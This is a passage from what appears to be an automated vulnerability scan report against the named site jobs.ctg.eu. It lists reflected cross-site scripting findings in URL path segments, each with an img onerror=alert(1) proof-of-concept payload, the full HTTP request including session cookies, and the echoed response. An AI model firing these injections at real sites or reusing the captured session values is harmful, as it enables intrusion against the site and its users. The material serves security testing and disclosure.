Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-css-views.css217ce"><img src=a onerror=alert(1)>e2f23c29595 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.80. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151 was submitted in the REST URL parameter 1. This input was echoed as 55ce2"><img src=a onerror=alert(1)>b6a4460d151 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151/all/modules/views/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites55ce2"><img src=a onerror=alert(1)>b6a4460d151-all-modules-views-js-base.js not-front not-logged-in page-sites55ce2img-srca-onerroralert1b6a4460d151 no-sidebars">
...[SNIP]...

3.81. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f was submitted in the REST URL parameter 2. This input was echoed as b1472"><img src=a onerror=alert(1)>f600b8d8b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allb1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f/modules/views/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:48:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:48:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allb1472"><img src=a onerror=alert(1)>f600b8d8b7f-modules-views-js-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.82. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6 was submitted in the REST URL parameter 3. This input was echoed as db72e"><img src=a onerror=alert(1)>21d9a5a41d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesdb72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6/views/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:49:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:49:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesdb72e"><img src=a onerror=alert(1)>21d9a5a41d6-views-js-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.83. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466 was submitted in the REST URL parameter 4. This input was echoed as 40667"><img src=a onerror=alert(1)>7444b52466 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466/js/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:50:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:50:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views40667"><img src=a onerror=alert(1)>7444b52466-js-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.84. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c was submitted in the REST URL parameter 5. This input was echoed as 98959"><img src=a onerror=alert(1)>38f529bd14c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/js98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c/base.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:51:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:51:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-js98959"><img src=a onerror=alert(1)>38f529bd14c-base.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.85. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/base.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a was submitted in the REST URL parameter 6. This input was echoed as 5d277"><img src=a onerror=alert(1)>086dd8d227a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/js/base.js5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:52:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:52:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-js-base.js5d277"><img src=a onerror=alert(1)>086dd8d227a not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.86. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d was submitted in the REST URL parameter 1. This input was echoed as a17d3"><img src=a onerror=alert(1)>d553028ad8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesa17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d/all/modules/views/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesa17d3"><img src=a onerror=alert(1)>d553028ad8d-all-modules-views-js-dependent.js not-front not-logged-in page-sitesa17d3img-srca-onerroralert1d553028ad8d no-sidebars">
...[SNIP]...

3.87. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1 was submitted in the REST URL parameter 2. This input was echoed as e3d6d"><img src=a onerror=alert(1)>f58295307b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/alle3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1/modules/views/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:48:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:48:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-alle3d6d"><img src=a onerror=alert(1)>f58295307b1-modules-views-js-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.88. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38 was submitted in the REST URL parameter 3. This input was echoed as ab624"><img src=a onerror=alert(1)>3f8d84be38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38/views/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:49:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:49:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesab624"><img src=a onerror=alert(1)>3f8d84be38-views-js-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.89. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530 was submitted in the REST URL parameter 4. This input was echoed as 42122"><img src=a onerror=alert(1)>5997e6b530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530/js/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:50:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:51:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views42122"><img src=a onerror=alert(1)>5997e6b530-js-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.90. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283 was submitted in the REST URL parameter 5. This input was echoed as b518a"><img src=a onerror=alert(1)>ec316c3a283 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/jsb518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283/dependent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:51:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:51:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-jsb518a"><img src=a onerror=alert(1)>ec316c3a283-dependent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.91. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/js/dependent.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef was submitted in the REST URL parameter 6. This input was echoed as db2bb"><img src=a onerror=alert(1)>d9d6098e8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/js/dependent.jsdb2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:52:57 GMT
Server: Apache/2.2.14 (Ubuntu)
